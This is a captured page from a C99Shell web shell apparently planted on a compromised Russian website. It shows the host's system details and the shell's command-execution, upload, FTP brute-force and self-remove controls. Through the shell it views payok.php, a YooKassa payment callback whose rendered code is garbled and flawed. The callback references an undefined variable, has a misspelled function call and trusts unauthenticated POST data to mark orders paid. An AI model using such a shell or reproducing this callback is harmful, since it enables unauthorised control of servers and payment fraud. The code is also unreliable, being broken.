!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.68 (Linux) PHP/7.4.33. PHP/7.4.33 

uname -a: Linux bjb2293782.nichost.ru 6.6.151-1.el8.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Aug 10
11:16:02 MSK 2026 x86_64
 

uid=12584(bjb2293782) gid=12584(bjb2293782) groups=12584(bjb2293782)  

Safe-mode: OFF (not secure)

/home/bjb2293782/xn--80abaeoqbbrbgf8aea5a2a2z.xn--p1ai/docs/   drwxr-x---
Free 2715.66 GB of 4607.12 GB (58.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     payok.php (1.15 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

require("std2.php");
require(
"paymentutils.php");


function 
ErrLog($txt)
{
    
$f fopen("_yookassa_error.txt","w");
    
fprintf($f$txt);
    
fclose($f);
    die(
$txt);
}

$postData file_get_contents('php://input');


if (!
preg_match("/\"paid\"\s*\:\s*true/"$response$g)) ErrLog("Заказ не оплачен!");

if (!
preg_match("/\"id\"\s*\:\s*\"([^\"]+)\"/"$postData$g)) ErrLog("Не найден id платежа от ЮКасса");
$yookassa_id $g[1];



$mysql mysqlopen();
$yookassa_id mysqli_escape_string($mysql$yookassa_id);
$result mysqli_query($mysql"SELECT `id` FROM libOrders WHERE `yookassa_id`='$yookassa_id' LIMIT 1");
if (
mysqli_errno($mysql)) ErrLog("mysql error: ".mysqli_error($mysql));
if (!(
$row mysqli_fetch_row($result))) ErrlLog("Order $yookassa_id not found!");
$order $row[0];
mysqli_free_result($result);



mysqli_query($mysql,"UPDATE libOrders SET `payDate`=NOW() WHERE `id`=$order");
if (
mysqli_errno($mysql)) ErrLog("mysql error: ".mysqli_error($mysql));

$code GenOrderProtectionCode($order);

header("Location: basket.php?order=$order&code=$code"301true);


?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0046 ]--